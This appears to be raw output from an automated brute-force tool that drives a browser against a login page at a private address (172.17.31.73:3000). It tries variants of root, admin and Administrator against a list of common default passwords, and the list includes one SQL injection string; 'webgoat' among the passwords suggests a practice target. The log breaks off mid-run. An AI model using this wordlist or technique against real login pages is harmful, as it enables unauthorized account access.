[+] A new file, has been created.
[*] Starting Driver...
[+] Driver Started.
[+] Accessing to 'http://172.17.31.73:3000/login.html'.
[*] Finding Elements...
[+] Element found ID="textfield-1009-inputEl"
[+] Element found ID="textfield-1010-inputEl"
[+] Element found ID="button-1012"
[+] trying user: root and password: asdasd
[+] trying user: root and password: 123456
[+] trying user: root and password: 1234567
[+] trying user: root and password: 12345678
[+] trying user: root and password: 123456789
[+] trying user: root and password: 1234567890
[+] trying user: root and password: Admin
[+] trying user: root and password: Administrator
[+] trying user: root and password: admin
[+] trying user: root and password: administrator
[+] trying user: root and password: administrador
[+] trying user: root and password: Administrador
[+] trying user: root and password: 123abc
[+] trying user: root and password: webgoat
[+] trying user: root and password: abc123
[+] trying user: root and password: 'or'1'='1
[+] trying user: root and password: password
[+] trying user: root and password: Password123
[+] trying user: root and password: Pass123
[+] trying user: root and password: Users
[+] trying user: root and password: 123abc465
[+] trying user: root and password: 123456abc
[+] trying user: root and password: qwerty
[+] trying user: root and password: qwerty123
[+] trying user: root and password: QWERTY
[+] trying user: root and password: QWERTY123
[+] trying user: root and password: 
[+] trying user: Root and password: asdasd
[+] trying user: Root and password: 123456
[+] trying user: Root and password: 1234567
[+] trying user: Root and password: 12345678
[+] trying user: Root and password: 123456789
[+] trying user: Root and password: 1234567890
[+] trying user: Root and password: Admin
[+] trying user: Root and password: Administrator
[+] trying user: Root and password: admin
[+] trying user: Root and password: administrator
[+] trying user: Root and password: administrador
[+] trying user: Root and password: Administrador
[+] trying user: Root and password: 123abc
[+] trying user: Root and password: webgoat
[+] trying user: Root and password: abc123
[+] trying user: Root and password: 'or'1'='1
[+] trying user: Root and password: password
[+] trying user: Root and password: Password123
[+] trying user: Root and password: Pass123
[+] trying user: Root and password: Users
[+] trying user: Root and password: 123abc465
[+] trying user: Root and password: 123456abc
[+] trying user: Root and password: qwerty
[+] trying user: Root and password: qwerty123
[+] trying user: Root and password: QWERTY
[+] trying user: Root and password: QWERTY123
[+] trying user: Root and password: 
[+] trying user: ROOT and password: asdasd
[+] trying user: ROOT and password: 123456
[+] trying user: ROOT and password: 1234567
[+] trying user: ROOT and password: 12345678
[+] trying user: ROOT and password: 123456789
[+] trying user: ROOT and password: 1234567890
[+] trying user: ROOT and password: Admin
[+] trying user: ROOT and password: Administrator
[+] trying user: ROOT and password: admin
[+] trying user: ROOT and password: administrator
[+] trying user: ROOT and password: administrador
[+] trying user: ROOT and password: Administrador
[+] trying user: ROOT and password: 123abc
[+] trying user: ROOT and password: webgoat
[+] trying user: ROOT and password: abc123
[+] trying user: ROOT and password: 'or'1'='1
[+] trying user: ROOT and password: password
[+] trying user: ROOT and password: Password123
[+] trying user: ROOT and password: Pass123
[+] trying user: ROOT and password: Users
[+] trying user: ROOT and password: 123abc465
[+] trying user: ROOT and password: 123456abc
[+] trying user: ROOT and password: qwerty
[+] trying user: ROOT and password: qwerty123
[+] trying user: ROOT and password: QWERTY
[+] trying user: ROOT and password: QWERTY123
[+] trying user: ROOT and password: 
[+] trying user: rOOt and password: asdasd
[+] trying user: rOOt and password: 123456
[+] trying user: rOOt and password: 1234567
[+] trying user: rOOt and password: 12345678
[+] trying user: rOOt and password: 123456789
[+] trying user: rOOt and password: 1234567890
[+] trying user: rOOt and password: Admin
[+] trying user: rOOt and password: Administrator
[+] trying user: rOOt and password: admin
[+] trying user: rOOt and password: administrator
[+] trying user: rOOt and password: administrador
[+] trying user: rOOt and password: Administrador
[+] trying user: rOOt and password: 123abc
[+] trying user: rOOt and password: webgoat
[+] trying user: rOOt and password: abc123
[+] trying user: rOOt and password: 'or'1'='1
[+] trying user: rOOt and password: password
[+] trying user: rOOt and password: Password123
[+] trying user: rOOt and password: Pass123
[+] trying user: rOOt and password: Users
[+] trying user: rOOt and password: 123abc465
[+] trying user: rOOt and password: 123456abc
[+] trying user: rOOt and password: qwerty
[+] trying user: rOOt and password: qwerty123
[+] trying user: rOOt and password: QWERTY
[+] trying user: rOOt and password: QWERTY123
[+] trying user: rOOt and password: 
[+] trying user: Admin and password: asdasd
[+] trying user: Admin and password: 123456
[+] trying user: Admin and password: 1234567
[+] trying user: Admin and password: 12345678
[+] trying user: Admin and password: 123456789
[+] trying user: Admin and password: 1234567890
[+] trying user: Admin and password: Admin
[+] trying user: Admin and password: Administrator
[+] trying user: Admin and password: admin
[+] trying user: Admin and password: administrator
[+] trying user: Admin and password: administrador
[+] trying user: Admin and password: Administrador
[+] trying user: Admin and password: 123abc
[+] trying user: Admin and password: webgoat
[+] trying user: Admin and password: abc123
[+] trying user: Admin and password: 'or'1'='1
[+] trying user: Admin and password: password
[+] trying user: Admin and password: Password123
[+] trying user: Admin and password: Pass123
[+] trying user: Admin and password: Users
[+] trying user: Admin and password: 123abc465
[+] trying user: Admin and password: 123456abc
[+] trying user: Admin and password: qwerty
[+] trying user: Admin and password: qwerty123
[+] trying user: Admin and password: QWERTY
[+] trying user: Admin and password: QWERTY123
[+] trying user: Admin and password: 
[+] trying user: Administrator and password: asdasd
[+] trying user: Administrator and password: 123456
[+] trying user: Administrator and password: 1234567
[+] trying user: Administrator and password: 12345678
[+] trying user: Administrator and password: 123456789
[+] trying user: Administrator and password: 1234567890
[+] trying user: Administrator and password: Admin
[+] trying user: Administrator and password: Administrator
[+] trying user: Administrator and password: admin
[+] trying user: Administrator and password: administrator
[+] trying user: Administrator and password: administrador
[+] trying user: Administrator and password: Administrador
[+] trying user: Administrator and password: 123abc
[+] trying user: Administrator and password: webgoat
[+] trying user: Administrator and password: abc123
[+] trying user: Administrator and password: 'or'1'='1
[+] trying user: Administrator and password: password
[+] trying user: Administrator and password: Password123
[+] trying user: Administrator and password: Pass123
[+] trying user: Administrator and password: Users
[+] trying user: Administrator and password: 123abc465
[+] trying user: Administrator and password: 123456abc
[+] trying user: Administrator and password: qwerty
[+] trying user: Administrator and password: qwerty123
[+] trying user: Administrator and password: QWERTY
[+] trying user: Administrator and password: QWERTY123
[+] trying user: Administrator and password: 
[+] trying user: admin and password: asdasd
[+] trying user: admin and password: 123456
[+] trying user: admin and password: 1234567
[+] trying user: admin and password: 12345678
[+] trying user: admin and password: 123456789
[+] trying user: admin and password: 1234567890
[+] trying user: admin and password: Admin
[+] trying user: admin and password: Administrator
[+] trying user: admin and password: admin
[+] trying user: admin and password: administrator

